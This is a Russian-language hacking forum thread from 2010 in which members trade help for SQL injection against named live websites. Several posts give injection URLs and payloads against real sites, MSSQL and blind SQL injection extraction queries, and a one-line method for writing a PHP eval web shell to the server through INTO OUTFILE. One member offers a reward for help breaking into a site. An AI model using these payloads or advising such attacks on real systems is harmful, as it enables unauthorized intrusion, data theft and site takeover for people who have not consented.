Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    подскажите пожалуйста, тут инъекция или что-то на нее похожее?

    http://nudistavenue.com/browse/all/18-20%27/all
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?
     
  3. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    Вылазит тоже самое только c %20

    SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start <= now() AND a.date_end >= now() AND a.status = 'active' AND a.adpage = 'knowledge_center_overview.php?type=2'%20group%20by%209999%20--%20' AND a.fileid = b.fileID [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' AND a.fileid = b.fileID' at line 5]

    как видно из запроса мой запрос как параметр передается и комментарий в конце не сканывает поэтому невыполняется, а если кавычку перед запросам убрать то там идет перенаправленние на главную страницу сразу
    хм при /**/ тоже перенаправляет на главную страницу.
    Карочи вот сайт http://www.wi-fi.org/knowledge_center_overview.php?type=2'

    расскажи че там как я просто учусь) за день штук 10 таких бывает)

    О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.
     
    #14703 NorB, 30 Aug 2010
    Last edited: 30 Aug 2010
  4. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Если версия mysql > 5, то можно узнать наверняка
    select table_schema from informashion_schema.tables where table_name='your_table';

    Если такой возможности нет, то удостовериться сделав запрос из этой таблицы, назвав предполагаемую базу:
    select * from предполагаемая_база.your_table;
    ошибки нет - значит предположение верно
     
  5. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    blablabla.php?start=16600+group+by+2+--+

    ошибка
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1


    как бороться с этим ,40
    почему то не комментируется...

    mr.celt - спс
     
    #14705 NorB, 31 Aug 2010
    Last edited: 31 Aug 2010
  6. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    А это не в Limit ли скуля? можешь попробовать /*
    но что то мне подсказывает, что это скуля в limit...
     
  7. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?
     
  8. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,018
    Likes Received:
    417
    Reputations:
    231
    Что именно ты хочешь вывести?
    Скинь сюда свою скулю, посмотрим что можно сделать.
     
  9. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    (MSSQL) Что не так с запросом?
    Code:
    1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='pass')--
    пытаюсь вытянуть имена колонок определенной таблицы, но выводятся колонки всех таблиц (ну т.е. какую бы таблицу не указал, выводятся одни и те же колонки).. вроде бы понятно объяснил :)
     
  10. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    http://tradebanging.com/community.php?start=-166000
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    https://forum.antichat.ru/showthread.php?p=2229980
     
    _________________________
    2 people like this.
  12. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Konqi, сп! помогло :) следующий раз буду юзать поиск :)
     
  13. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    В limit нельзя использовать подзапросы. Если нет order bу, то крутится через union select. Если он есть, то после него нельзя использовать union, следовательно в таком случае проведение инъекции невозможно, только если сразу лить шелл.
    into outfile '/path/shell.php' lines terminated by "<?php eval($_GET[c]);?>"
     
    1 person likes this.
  14. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject.
    Есть баг
    Но при
    Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти?
    Через order+by определил 5 столбцов.
    Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку.
    Если все прокатит возможно хорошее вознагрождение!
     
    1 person likes this.
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    попробуйте "in" вместо ">"

    mysql> SELECT 2 IN (0,3,5,7);
    -> 0

    mysql> SELECT 2 IN (1,2,3,2,5,7)
    -> 1

    или уменьш значение, потому и выворачиваетцо потому что ложь
    site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>10

    а воше статьи почитайте как их крутить.

    зы я не ясновыдящий и другие.
     
    #14715 Strilo4ka, 31 Aug 2010
    Last edited: 31 Aug 2010
    2 people like this.
  16. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    Не подскажешь статейку по Blind Sql inject :rolleyes:
    Кстати union select тоже не работает
     
    #14716 LiRvD082, 31 Aug 2010
    Last edited: 31 Aug 2010
    1 person likes this.
  17. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    https://forum.antichat.ru/thread119047.html
     
    1 person likes this.
  18. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    статтей на ачате куча:
    site:forum.antichat.ru blind в гугле или поиском у нас
    или другие ресурсы на такую тематику.

    продолжение на rdot:
    https://rdot.org/forum/showthread.php?t=245&page=2.

    https://forum.antichat.ru/thread35207-blind.html

    https://forum.antichat.ru/thread18552-blind.html

    https://forum.antichat.ru/thread19844.html

    тоесть искать надо.

    ...

    зы
    в ваши вопросы по уязвимостям
    ->поиск в этой теме
    ->blind.
    и будет куча таких вопросов и как они решались.

    :)
     
    #14718 Strilo4ka, 31 Aug 2010
    Last edited: 31 Aug 2010
  19. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Возможен ли inject с такой ошибкой:
    Code:
    Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/.../index.php on line 19
    В запрос подставлял '
     
  20. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Еще вопрос (не относящийся к предыдущему)... при подстановке ' в запрос... открывается белая страница с надписью "Tampering: 338"
    Что это означает? :)
     
Loading...
Thread Status:
Not open for further replies.